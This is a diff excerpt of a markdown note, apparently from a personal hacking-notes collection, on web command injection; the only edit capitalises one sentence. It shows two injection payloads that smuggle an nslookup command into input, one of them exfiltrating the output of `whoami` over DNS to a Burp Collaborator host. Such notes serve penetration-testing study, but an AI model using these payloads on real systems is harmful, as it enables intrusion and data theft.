benjugat/hackingnotes/_docs/web/command-injection.md

 & nslookup burp-collaborator.oastify.com &
 ```

-we can use these channels to easily exfiltrate data:
+We can use these channels to easily exfiltrate data:

 ```
 & nslookup `whoami`.burp-collaborator.oastify.com &